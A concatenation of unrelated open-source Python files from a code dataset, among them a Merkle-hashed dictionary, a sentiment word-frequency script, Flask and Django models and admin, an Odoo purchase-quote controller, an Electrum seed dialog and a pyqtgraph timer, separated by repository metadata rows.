self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
while hash_value in self.__leaf_hashes[position]:
self.__leaf_hashes[position].remove(hash_value)
self.__rehash(position)
def __build_tree(self):
tree = []
for i in xrange(self.__tree_depth+1):
current_row = [None for j in xrange(1 << i)]
tree.append(current_row)
return tree
def __build_leaf_items(self):
leaf_count = 1 << self.__tree_depth
new_leaf_items = [[] for i in xrange(leaf_count)]
for key, hash_value in self.__key_to_hash.iteritems():
position = (crc32(key) & 0xffffffff) % leaf_count
new_leaf_items[position].append(hash_value)
return new_leaf_items
def __rehash_all(self):
self.__tree[-1] = [self.__hash_leaf(leaf_items) for leaf_items in self.__leaf_hashes]
for row_nr in xrange(self.__tree_depth,0,-1):
row = self.__tree[row_nr]
for current_position in xrange(0, (len(row)+1)/2):
self.__rehash_parent(row_nr, current_position)
def __rehash(self, leaf_position):
leaf_items = self.__leaf_hashes[leaf_position]
self.__tree[-1][leaf_position] = self.__hash_leaf(leaf_items)
lchild_pos = leaf_position
for row_nr in xrange(self.__tree_depth, 0, -1):
#current_position = self.__rehash_parent(row_nr, current_position)
rchild_pos = lchild_pos | (1 << (row_nr - 1))
lchild_pos = lchild_pos & ((1 << (row_nr - 1)) - 1)
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
def __hash_leaf(self, leaf_items):
leaf_items.sort()
hashalg = self.__hashalg()
for item in leaf_items:
hashalg.update(item)
return hashalg.digest()
def __rehash_parent(self, row_nr, element_pos):
lchild_pos = element_pos & ((1 << (row_nr - 1)) - 1)
rchild_pos = element_pos | (1 << (row_nr - 1))
#parent_pos = lchild_pos
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
#lchild_hash = children_row[lchild_pos]
#rchild_hash = children_row[rchild_pos]
#parent_row[parent_pos] = self.__hashalg(lchild_hash + \
# rchild_hash).digest()
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
if __name__ == '__main__':
pangram = HashedDict(pangram="The quick brown fox jumps over the lazy dog")
assert pangram.get_hash() == '\xe9|\xdcJ=\xda\x84\xbd\xa6\x8e\xea\x9c=\x16\x93' + \
'x\xb2\xff9\x83S!\xfbE\xbc\x0c\x83\xb8`H\x94\xa6'
hd1 = HashedDict()
empty_hash = hd1.get_hash()
assert empty_hash == "\xe3\xb0\xc4B\x98\xfc\x1c\x14\x9a\xfb\xf4\xc8\x99" + \
"o\xb9$'\xaeA\xe4d\x9b\x93L\xa4\x95\x99\x1bxR\xb8U"
hd1["key1"] = "value1"
new_hash = hd1.get_hash()
del hd1["key1"]
assert empty_hash == hd1.get_hash()
hd2 = HashedDict(key1="value1", key2="value2")
del hd2["key2"]
assert hd2.get_hash() == new_hash
del hd2["key1"]
assert hd2.get_hash() == empty_hash
hd3 = HashedDict()
assert hd3.get_hash() == empty_hash
hashList = []
for i in xrange(1026):
hashList.append(hd3.get_hash())
hd3[str(i)] = i
for i in xrange(1025, -1, -1):
del hd3[str(i)]
assert hashList[i] == hd3.get_hash()
print "all tests successful"
| gpl-3.0 | 3,286,080,142,900,720,000 | 33.19661 | 95 | 0.54322 | false | 3.56089 | false | false | false |
eriksonJAguiar/TCC-UENP-Codigos | My_codes/tools-sentiment/word_freq.py | 1 | 4759 | import nltk
import pandas as pd
import re
from googletrans import Translator
from unicodedata import normalize
def read_csv(file):
df1 = pd.DataFrame.from_csv('files_extern/%s.csv'%(file),sep=';',index_col=0,encoding ='ISO-8859-1')
df1 = df1.reset_index()
return df1
def write_csv(data,file):
df = pd.DataFrame(data)
df.to_csv('files_extern/'+file+'.csv', mode='w', sep=';',index=False, header=False,encoding='utf8')
def clear(dataframe):
new_df_tweet = []
new_df_sent = []
zipped = zip(dataframe['tweet'],dataframe['opiniao'])
for (df,opiniao) in zipped:
expr = re.sub(r"http\S+", "", df)
#expr = re.sub(r"[@#]\S+","",expr)
expr = normalize('NFKD',expr).encode('ASCII','ignore').decode('ASCII')
filtrado = [w for w in nltk.regexp_tokenize(expr.lower(),"[^0-9\W_]+") if not w in nltk.corpus.stopwords.words('portuguese')]
for f in filtrado:
if len(f) >= 2:
#print(f)
#print(opiniao)
new_df_tweet.append(f)
new_df_sent.append(opiniao)
new_df = pd.DataFrame()
new_df['tokens'] = new_df_tweet
new_df['sentimento'] = new_df_sent
return new_df
def convert_df(df):
new_df = []
for d in df:
if d == 'Positivo':
new_df.append(1)
elif d == 'Neutro':
new_df.append(0)
elif d == 'Negativo':
new_df.append(-1)
return new_df
def exlusivos(vet_neg,vet_neu,vet_pos):
ex_pos = []
ex_neg = []
ex_neu = []
tupla = zip(vet_neg,vet_neu,vet_pos)
for (neg,neu,pos) in tupla:
if not (neg in vet_pos or neg in vet_neu):
ex_neg.append(neg)
if not (neu in vet_neg or neu in vet_pos):
ex_neu.append(neu)
if not (pos in vet_neg or pos in vet_neu):
ex_pos.append(pos)
print(ex_neg)
print(ex_neu)
print(ex_pos)
return ex_neg, ex_neu, ex_pos
def bigram(frases,vet_neg, vet_neu,vet_pos):
    # Left unfinished in the original source (the body stopped at a bare
    # "if f.find()"); minimal completion so the module parses: keep the
    # phrases that contain a word of each class. Never called from __main__.
    bi_neg = [f for f in frases if any(f.find(w) >= 0 for w in vet_neg)]
    bi_neu = [f for f in frases if any(f.find(w) >= 0 for w in vet_neu)]
    bi_pos = [f for f in frases if any(f.find(w) >= 0 for w in vet_pos)]
    return bi_neg, bi_neu, bi_pos
if __name__ == '__main__':
df_tweets = read_csv('dataset-portuguese')
df_tweets['opiniao'] = convert_df(df_tweets['opiniao'])
df_words = clear(df_tweets)
neg = df_words.loc[df_words['sentimento'] == -1]
neu = df_words.loc[df_words['sentimento'] == 0]
pos = df_words.loc[df_words['sentimento'] == 1]
neg_freq = nltk.FreqDist(neg['tokens'])
neu_freq = nltk.FreqDist(neu['tokens'])
pos_freq = nltk.FreqDist(pos['tokens'])
vet_neg = []
vet_neu = []
vet_pos = []
#neg_freq.plot(50, cumulative=False)
#neu_freq.plot(50, cumulative=False)
#pos_freq.plot(50, cumulative=False)
#print(neg_freq.most_common(30))
#print('------------------------')
#print(neu_freq.most_common(30))
#print('------------------------')
#print(pos_freq.most_common(30))
tupla = zip(neg_freq.most_common(len(neg)),neu_freq.most_common(len(neu)),pos_freq.most_common(len(pos)))
df_neg = pd.DataFrame()
df_neu = pd.DataFrame()
df_pos = pd.DataFrame()
words_neg = dict()
words_neu = dict()
words_pos = dict()
words_neg['pt'] = []
words_neg['en'] = []
words_neg['es'] = []
words_neu['pt'] = []
words_neu['en'] = []
words_neu['es'] = []
words_pos['pt'] = []
words_pos['en'] = []
words_pos['es'] = []
#neg_freq.plot(30, cumulative=False)
translator = Translator(service_urls=['translate.google.com','translate.google.com.br'])
for (ng,nu,ps) in tupla:
vet_neg.append(ng[0])
vet_neu.append(nu[0])
vet_pos.append(ps[0])
vet_neg, vet_neu,vet_pos = exlusivos(vet_neg,vet_neu,vet_pos)
tupla = zip(vet_neg[:50],vet_neu[:50],vet_pos[:50])
for (ng,nu,ps) in tupla:
words_neg['pt'].append(ng)
en=translator.translate(ng, dest='en').text
words_neg['en'].append(en)
words_neg['es'].append(translator.translate(en, dest='es').text)
words_neu['pt'].append(nu)
en=translator.translate(nu, dest='en').text
words_neu['en'].append(en)
words_neu['es'].append(translator.translate(en, dest='es').text)
words_pos['pt'].append(ps)
en=translator.translate(ps, dest='en').text
words_pos['en'].append(en)
words_pos['es'].append(translator.translate(en, dest='es').text)
df_neg['pt'] = words_neg['pt']
df_neg['en'] = words_neg['en']
df_neg['es'] = words_neg['es']
df_neu['pt'] = words_neu['pt']
df_neu['en'] = words_neu['en']
df_neu['es'] = words_neu['es']
df_pos['pt'] = words_pos['pt']
df_pos['en'] = words_pos['en']
df_pos['es'] = words_pos['es']
write_csv(df_neg,'bigram_neg')
write_csv(df_neu,'bigram_neu')
write_csv(df_pos,'bigram_pos')
| gpl-3.0 | -3,722,365,995,457,834,500 | 26.039773 | 133 | 0.566085 | false | 2.735057 | false | false | false |
evereux/flask_template | application/models.py | 1 | 2773 | import datetime
from application import db
from config import admin_group_name
Base = db.Model
username_maxlength = 24
name_maxlength = 60
email_maxlength = 24
group_maxlength = 64
groups = db.Table('groups',
db.Column('user_id', db.Integer, db.ForeignKey('users.id')),
db.Column('group_id', db.Integer, db.ForeignKey('group.id'))
)
class User(Base):
# defines tablename as it will be create in SQL
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(username_maxlength), index=True, unique=True)
name = db.Column(db.String(name_maxlength))
password = db.Column(db.LargeBinary(60))
email = db.Column(db.String(email_maxlength), unique=True)
date_added = db.Column(db.DateTime)
date_modified = db.Column(db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, username, name, email, password):
self.username = username
self.name = name
self.password = password
self.email = email
def __repr__(self):
return '<User {}>'.format(self.username)
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
@property
def is_admin(self):
""" returns true if the user is a member of the 'admin' group"""
user = User.query.filter_by(id = self.id).first()
for g in user.groups:
if g.group_name == admin_group_name:
return True
def get_id(self):
return str(self.id)
class Group(Base):
id = db.Column(db.Integer, primary_key=True)
group_name = db.Column(db.String(group_maxlength))
users = db.relationship('User',
secondary=groups,
backref=db.backref('groups',
lazy='dynamic',
order_by=group_name
)
)
# this is for when a group has many groups
# ie everyone in group 'admin' can be a member of group 'all'
# parents = db.relationship('Group',
# secondary=group_to_group,
# primaryjoin=id==group_to_group.c.parent_id,
# secondaryjoin=id==group_to_group.c.child_id,
# backref="children",
# remote_side=[group_to_group.c.parent_id])
def __init__(self, group_name):
self.group_name = group_name
@property
def __repr__(self):
return self.group_name
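# Illustrative usage sketch (added comment, not part of the original module):
# the `groups` association table above links User and Group many-to-many, so
# membership can be managed through the relationship. Names below are
# assumptions for demonstration only.
#
#     admins = Group(admin_group_name)
#     admins.users.append(some_user)
#     db.session.add(admins)
#     db.session.commit()
#     some_user.groups.all()   # dynamic backref -> [<Group ...>]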
| mit | 7,453,348,614,232,633,000 | 29.472527 | 80 | 0.547782 | false | 4.030523 | false | false | false |
bringsvor/bc_website_purchase | controllers/main.py | 1 | 11590 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
import werkzeug
import datetime
import time
import logging
import base64
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class purchase_quote(http.Controller):
@http.route([
"/purchase/<int:order_id>",
"/purchase/<int:order_id>/<token>"
], type='http', auth="public", website=True)
def view(self, order_id, token=None, message=False, **post):
        # use SUPERUSER_ID to allow a public user to access/view the order,
        # but only if he knows the private token
user_obj = request.registry.get('res.users')
group_obj = request.registry.get('res.groups')
user = user_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, request.uid)
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, token and SUPERUSER_ID or request.uid, order_id)
now = time.strftime('%Y-%m-%d')
"""
if token:
if token != order.access_token:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier ')
self.__message_post(body, order_id, type='comment')
"""
# if token is None and ( request.uid==user.id and user.active==False ):
if ( request.uid==user.id and user.active==False ):
if request.env.ref('web.login', False):
values = request.params.copy() or {}
values["redirect"] = "/purchase/%i" % (order_id);
return request.render('web.login', values)
# Checks groups
broker = False
# import pdb;pdb.set_trace()
for group_id in user.groups_id:
group = group_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, group_id.id)
if group.name == 'Elmatica Broker':
broker = True
if not broker:
partner_id = user.partner_id.parent_id.id or user.partner_id.id
if partner_id and request.uid != SUPERUSER_ID:
if partner_id != order.partner_id.id:
return request.website.render('website.404')
else:
if request.uid != SUPERUSER_ID:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier')
self.__message_post(body, order_id, type='comment')
        # If the supplier is viewing this, he has received it; and if he has received it, it must have been sent
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'send_rfq', context=request.context)
days = 0
if order.validity_date:
days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1
values = {
'quotation': order,
'message': message and int(message) or False,
'option': bool(filter(lambda x: not x.line_id, order.options)),
'order_valid': (not order.validity_date) or (now <= order.validity_date),
'days_valid': max(days, 0)
}
return request.website.render('bc_website_purchase.po_quotation', values)
# @http.route(['/purchase/accept'], type='json', auth="public", website=True)
@http.route(['/purchase/<int:order_id>/<token>/accept'], type='http', auth="public", website=True)
def accept(self, order_id, token=None, signer=None, sign=None, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
attachments=sign and [('signature.png', sign.decode('base64'))] or []
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
message = _('RFQ signed by %s') % (signer,)
self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments)
return werkzeug.utils.redirect("/purchase/%s" % (order_id))
@http.route(['/purchase/<int:order_id>/<token>/decline'], type='http', auth="public", website=True)
def decline(self, order_id, token, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
request.registry.get('purchase.order').action_cancel(request.cr, SUPERUSER_ID, [order_id])
message = post.get('decline_message')
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment')
return werkzeug.utils.redirect("/purchase/%s/%s?message=2" % (order_id, token))
@http.route(['/purchase/<int:order_id>/<token>/post'], type='http', auth="public", website=True)
def post(self, order_id, token, **post):
        # use SUPERUSER_ID to allow a public user to access/view the order
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
message = post.get('comment')
ufile = post.get('attachment')
attachment_ids = []
kwargs = {}
if token != order.access_token:
return request.website.render('website.404')
if ufile:
Model = request.session.model('ir.attachment')
try:
data_attach = {
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': 'purchase.order',
'res_id': int(order_id)
}
attachment_id = Model.create( data_attach, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
#attachment_ids.append((0, 0, data_attach))
attachment_ids.append(attachment_id)
kwargs = { 'attachment_ids': attachment_ids }
except Exception:
args = {'error': "Something horrible happened"}
_logger.exception("Fail to upload attachment %s" % ufile.filename)
return werkzeug.utils.redirect("/purchase/%s/%s?message=0" % (order_id, token))
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment',**kwargs)
return werkzeug.utils.redirect("/purchase/%s/%s?message=1" % (order_id, token))
# def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]):
def __message_post(self, message, order_id, type='comment', subtype=False, **kwargs):
request.session.body = message
cr, uid, context = request.cr, request.uid, request.context
user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context)
if 'body' in request.session and request.session.body:
request.registry.get('purchase.order').message_post(cr, SUPERUSER_ID, order_id,
body=request.session.body,
type=type,
subtype=subtype,
author_id=user.partner_id.id,
context=context,
attachments=None,
parent_id=False,
subject=None,
content_subtype='html',
**kwargs
)
request.session.body = False
return True
@http.route(['/purchase/update_line'], type='json', auth="public", website=True)
# def update_line(self, update_data, **post):
def update_line(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent'):
return False
# import pdb;pdb.set_trace()
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
try:
leadtime = post['leadtime'][i]
except:
leadtime = 0
pass
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
'leadtime': leadtime,
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
return True
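    # Sketch of the JSON payload update_line() expects, inferred from the loop
    # above (field names come from the code; the values are made up):
    #     {"order_id": 42,
    #      "line_id": [7, 8],
    #      "price_unit": ["1.20", "0.95"],
    #      "leadtime": ["10", "12"]}
    # Each index i updates purchase.order.line line_id[i] with its price/leadtime.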
@http.route(['/purchase/save'], type='json', auth="public", website=True)
def save(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent','confirmed','approved'):
return False
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
#try:
# leadtime = post['leadtime'][i]
#except:
# leadtime = 0
# pass
if order.state in ('draft','sent'):
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
# 'leadtime': leadtime,
}
else:
vals = {
'date_code': post['date_code'][i],
'units_shipped': post['units_shipped'][i],
'weight': post['weight'][i],
'collies': post['collies'][i],
'units_in_stock': post['units_in_stock'][i],
'lot_week': post['lot_week'][i],
'lot_year': post['lot_year'][i],
'batch_number': post['batch_number'][i],
'tracking_number': post['tracking_number'][i],
'date_code': post['date_code'][i],
'expiry_date': post['expiry_date'][i],
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.write(request.cr,SUPERUSER_ID,[order_id],{'saved': True},context=request.context)
return True
@http.route(["/purchase/template/<model('purchase.quote.template'):quote>"], type='http', auth="user", website=True)
def template_view(self, quote, **post):
values = { 'template': quote }
return request.website.render('bc_website_purchase.po_template', values)
| agpl-3.0 | -1,163,517,802,710,959,900 | 41.925926 | 120 | 0.605091 | false | 3.65846 | false | false | false |
philanthropy-u/edx-platform | openedx/features/partners/admin.py | 1 | 1216 | from django.contrib import admin
from django.urls import reverse
from .models import Partner, PartnerCommunity, PartnerUser
class PartnerAdmin(admin.ModelAdmin):
"""
Django admin customizations for Partner model
"""
list_display = ('id', 'label', 'slug', 'partner_url')
readonly_fields = ('partner_url',)
def partner_url(self, obj):
if obj.slug:
return reverse('partner_url', kwargs={'slug': obj.slug})
class PartnerUserModelAdmin(admin.ModelAdmin):
"""
Django admin to verify if user is affiliated with partner or not after login or registration
"""
raw_id_fields = ('user',)
class PartnerCommunityModelAdmin(admin.ModelAdmin):
"""
Django admin model to add community id to partner so that every user is added automatically to that community
"""
list_display = ['id', 'partner', 'community_id']
search_fields = ('partner', 'community_id')
class Meta(object):
verbose_name = 'Partner Community'
verbose_name_plural = 'Partner Communities'
admin.site.register(Partner, PartnerAdmin)
admin.site.register(PartnerCommunity, PartnerCommunityModelAdmin)
admin.site.register(PartnerUser, PartnerUserModelAdmin)
| agpl-3.0 | 6,408,310,665,756,646,000 | 28.658537 | 113 | 0.702303 | false | 4.251748 | false | false | false |
vialectrum/vialectrum | electrum_ltc/gui/qt/seed_dialog.py | 1 | 9848 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QCheckBox, QHBoxLayout, QLineEdit,
QLabel, QCompleter, QDialog, QStyledItemDelegate)
from electrum_ltc.i18n import _
from electrum_ltc.mnemonic import Mnemonic, seed_type
from electrum_ltc import old_mnemonic
from .util import (Buttons, OkButton, WWLabel, ButtonsTextEdit, icon_path,
EnterButton, CloseButton, WindowModalDialog, ColorScheme)
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .completion_text_edit import CompletionTextEdit
def seed_warning_msg(seed):
return ''.join([
"<p>",
_("Please save these {0} words on paper (order is important). "),
_("This seed will allow you to recover your wallet in case "
"of computer failure."),
"</p>",
"<b>" + _("WARNING") + ":</b>",
"<ul>",
"<li>" + _("Never disclose your seed.") + "</li>",
"<li>" + _("Never type it on a website.") + "</li>",
"<li>" + _("Do not store it electronically.") + "</li>",
"</ul>"
]).format(len(seed.split()))
class SeedLayout(QVBoxLayout):
def seed_options(self):
dialog = QDialog()
vbox = QVBoxLayout(dialog)
if 'ext' in self.options:
cb_ext = QCheckBox(_('Extend this seed with custom words'))
cb_ext.setChecked(self.is_ext)
vbox.addWidget(cb_ext)
if 'bip39' in self.options:
def f(b):
self.is_seed = (lambda x: bool(x)) if b else self.saved_is_seed
self.is_bip39 = b
self.on_edit()
if b:
msg = ' '.join([
'<b>' + _('Warning') + ':</b> ',
_('BIP39 seeds can be imported in Electrum, so that users can access funds locked in other wallets.'),
_('However, we do not generate BIP39 seeds, because they do not meet our safety standard.'),
_('BIP39 seeds do not include a version number, which compromises compatibility with future software.'),
_('We do not guarantee that BIP39 imports will always be supported in Electrum.'),
])
else:
msg = ''
self.seed_warning.setText(msg)
cb_bip39 = QCheckBox(_('BIP39 seed'))
cb_bip39.toggled.connect(f)
cb_bip39.setChecked(self.is_bip39)
vbox.addWidget(cb_bip39)
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
self.is_ext = cb_ext.isChecked() if 'ext' in self.options else False
self.is_bip39 = cb_bip39.isChecked() if 'bip39' in self.options else False
def __init__(self, seed=None, title=None, icon=True, msg=None, options=None,
is_seed=None, passphrase=None, parent=None, for_seed_words=True):
QVBoxLayout.__init__(self)
self.parent = parent
self.options = options
if title:
self.addWidget(WWLabel(title))
if seed: # "read only", we already have the text
if for_seed_words:
self.seed_e = ButtonsTextEdit()
else: # e.g. xpub
self.seed_e = ShowQRTextEdit()
self.seed_e.setReadOnly(True)
self.seed_e.setText(seed)
else: # we expect user to enter text
assert for_seed_words
self.seed_e = CompletionTextEdit()
self.seed_e.setTabChangesFocus(False) # so that tab auto-completes
self.is_seed = is_seed
self.saved_is_seed = self.is_seed
self.seed_e.textChanged.connect(self.on_edit)
self.initialize_completer()
self.seed_e.setMaximumHeight(75)
hbox = QHBoxLayout()
if icon:
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("seed.png"))
.scaledToWidth(64, mode=Qt.SmoothTransformation))
logo.setMaximumWidth(60)
hbox.addWidget(logo)
hbox.addWidget(self.seed_e)
self.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addStretch(1)
self.seed_type_label = QLabel('')
hbox.addWidget(self.seed_type_label)
# options
self.is_bip39 = False
self.is_ext = False
if options:
opt_button = EnterButton(_('Options'), self.seed_options)
hbox.addWidget(opt_button)
self.addLayout(hbox)
if passphrase:
hbox = QHBoxLayout()
passphrase_e = QLineEdit()
passphrase_e.setText(passphrase)
passphrase_e.setReadOnly(True)
hbox.addWidget(QLabel(_("Your seed extension is") + ':'))
hbox.addWidget(passphrase_e)
self.addLayout(hbox)
self.addStretch(1)
self.seed_warning = WWLabel('')
if msg:
self.seed_warning.setText(seed_warning_msg(seed))
self.addWidget(self.seed_warning)
def initialize_completer(self):
bip39_english_list = Mnemonic('en').wordlist
old_list = old_mnemonic.wordlist
only_old_list = set(old_list) - set(bip39_english_list)
self.wordlist = list(bip39_english_list) + list(only_old_list) # concat both lists
self.wordlist.sort()
class CompleterDelegate(QStyledItemDelegate):
def initStyleOption(self, option, index):
super().initStyleOption(option, index)
# Some people complained that due to merging the two word lists,
# it is difficult to restore from a metal backup, as they planned
# to rely on the "4 letter prefixes are unique in bip39 word list" property.
# So we color words that are only in old list.
if option.text in only_old_list:
# yellow bg looks ~ok on both light/dark theme, regardless if (un)selected
option.backgroundBrush = ColorScheme.YELLOW.as_color(background=True)
self.completer = QCompleter(self.wordlist)
delegate = CompleterDelegate(self.seed_e)
self.completer.popup().setItemDelegate(delegate)
self.seed_e.set_completer(self.completer)
def get_seed(self):
text = self.seed_e.text()
return ' '.join(text.split())
def on_edit(self):
s = self.get_seed()
b = self.is_seed(s)
if not self.is_bip39:
t = seed_type(s)
label = _('Seed Type') + ': ' + t if t else ''
else:
from electrum_ltc.keystore import bip39_is_checksum_valid
is_checksum, is_wordlist = bip39_is_checksum_valid(s)
status = ('checksum: ' + ('ok' if is_checksum else 'failed')) if is_wordlist else 'unknown wordlist'
label = 'BIP39' + ' (%s)'%status
self.seed_type_label.setText(label)
self.parent.next_button.setEnabled(b)
# disable suggestions if user already typed an unknown word
for word in self.get_seed().split(" ")[:-1]:
if word not in self.wordlist:
self.seed_e.disable_suggestions()
return
self.seed_e.enable_suggestions()
class KeysLayout(QVBoxLayout):
def __init__(self, parent=None, header_layout=None, is_valid=None, allow_multi=False):
QVBoxLayout.__init__(self)
self.parent = parent
self.is_valid = is_valid
self.text_e = ScanQRTextEdit(allow_multi=allow_multi)
self.text_e.textChanged.connect(self.on_edit)
if isinstance(header_layout, str):
self.addWidget(WWLabel(header_layout))
else:
self.addLayout(header_layout)
self.addWidget(self.text_e)
def get_text(self):
return self.text_e.text()
def on_edit(self):
valid = False
try:
valid = self.is_valid(self.get_text())
except Exception as e:
self.parent.next_button.setToolTip(f'{_("Error")}: {str(e)}')
else:
self.parent.next_button.setToolTip('')
self.parent.next_button.setEnabled(valid)
class SeedDialog(WindowModalDialog):
def __init__(self, parent, seed, passphrase):
WindowModalDialog.__init__(self, parent, ('Vialectrum - ' + _('Seed')))
self.setMinimumWidth(400)
vbox = QVBoxLayout(self)
title = _("Your wallet generation seed is:")
slayout = SeedLayout(title=title, seed=seed, msg=True, passphrase=passphrase)
vbox.addLayout(slayout)
vbox.addLayout(Buttons(CloseButton(self)))
| mit | 6,886,666,293,626,559,000 | 40.906383 | 128 | 0.60134 | false | 3.9392 | false | false | false |
hahnicity/ace | chapter1/problem3.py | 1 | 1222 | """
Problem 3.
calculate the time series
yt = 5 + .05 * t + Et (Where E is epsilon)
for years 1960, 1961, ..., 2001 assuming Et independently and
identically distributed with mean 0 and sigma 0.2.
"""
from random import uniform
from matplotlib.pyplot import plot, show
from numpy import array, polyfit, poly1d
def create_distribution(size):
"""
Create a distribution, identically distributed, with mean 0 and
sigma 0.2
"""
# Shit it's way easier to just do some uniform distribution
# This is a bit over my head, and not possible for me without
# pen and paper
return array([uniform(-0.2, .2) for _ in xrange(size)])
def create_time_series(start_year, end_year):
"""
Create the time series, yt, then perform a regress on yt, plot yt and the
its trendline
"""
t_array = array(range(start_year, end_year + 1))
epsilon_t = create_distribution(len(t_array))
yt = array([5 + .05 * t_i + epsilon_t[i] for i, t_i in enumerate(t_array)])
fit = polyfit(t_array, yt, 1)
fit_func = poly1d(fit)
plot(t_array, yt, "yo", t_array, fit_func(t_array), "--k")
show()
def main():
create_time_series(1960, 2001)
if __name__ == "__main__":
main()
| unlicense | -3,859,389,947,506,041,300 | 25 | 79 | 0.644845 | false | 3.215789 | false | false | false |
robertsj/poropy | pyqtgraph/ThreadsafeTimer.py | 1 | 1600 | from pyqtgraph.Qt import QtCore, QtGui
class ThreadsafeTimer(QtCore.QObject):
"""
Thread-safe replacement for QTimer.
"""
timeout = QtCore.Signal()
sigTimerStopRequested = QtCore.Signal()
sigTimerStartRequested = QtCore.Signal(object)
def __init__(self):
QtCore.QObject.__init__(self)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.timerFinished)
self.timer.moveToThread(QtCore.QCoreApplication.instance().thread())
self.moveToThread(QtCore.QCoreApplication.instance().thread())
self.sigTimerStopRequested.connect(self.stop, QtCore.Qt.QueuedConnection)
self.sigTimerStartRequested.connect(self.start, QtCore.Qt.QueuedConnection)
def start(self, timeout):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "start timer", self, "from gui thread"
self.timer.start(timeout)
else:
#print "start timer", self, "from remote thread"
self.sigTimerStartRequested.emit(timeout)
def stop(self):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "stop timer", self, "from gui thread"
self.timer.stop()
else:
